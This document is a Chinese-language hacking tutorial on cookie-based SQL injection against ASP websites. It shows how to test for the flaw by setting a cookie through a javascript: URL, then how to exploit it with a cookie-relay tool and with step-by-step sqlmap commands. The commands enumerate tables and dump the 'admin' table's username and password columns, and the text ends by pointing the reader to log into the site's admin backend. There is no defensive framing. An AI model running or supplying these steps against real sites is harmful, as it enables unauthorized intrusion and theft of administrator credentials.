cookie中转注入,使用sqlmap中转注入

一,判断是否有cookie注入:

目标网站http://www.xxx.com/x.asp?id=1

1.在IE浏览器访问去掉参数(id=1)的url: http://www.xxx.com/x.asp?(加载页面,显示不正常,原因是没有输参数)。

2.在IE浏览器输入javascript:alert(document.cookie="id="+escape("1"));(添加cookie信息),再次访问http://www.xxx.com/x.asp?(加载页面,显示正常)。此时这个网页就存在cookie注入,反之没有。

 

二,利用cookie中转注入:

     使用的工具有: 手工注入辅助工具+明小子,Sqlmap。

 

 

手工注入辅助工具+明小子:

 

1.输入url,然后点击转到。如图

cookie中转注入,使用sqlmap中转注入

2.点击Cookie中转,之后会跳出一个新的url 如图

cookie中转注入,使用sqlmap中转注入

3.打开明小子,利用这个url。如图

cookie中转注入,使用sqlmap中转注入

4.开始检测 如图

cookie中转注入,使用sqlmap中转注入

2.利用Sqlmap Cookie注入:

1.命令:sqlmap.py –u”url” --cookie “参数” --level 2

注:例如目标网站为:http://www.xxx.com/x.asp?id=1,则sqlmap命令为sqlmap.py –u”http://www.xxx.com/x.asp” --cookie “id=1” --level 2

cookie中转注入,使用sqlmap中转注入

2.执行命令: sqlmap.py –u”url” --cookie “参数” --level 2 --tables(查所有表)如图

cookie中转注入,使用sqlmap中转注入

3.执行命令:sqlmap.py –u”url” --cookie“参数” --level 2 --tables --columns –T”admin”(查询列名)

cookie中转注入,使用sqlmap中转注入

4.执行命令: sqlmap.py –u”url” --cookie “参数” --level 2 --tables --dump –C”usernma,paasword” –T”admin”(查询字段)

cookie中转注入,使用sqlmap中转注入

OK,两种方法都可以使用。成功拿到帐号密码之后,接下就找后台管理登入进去,这里就不多介绍了。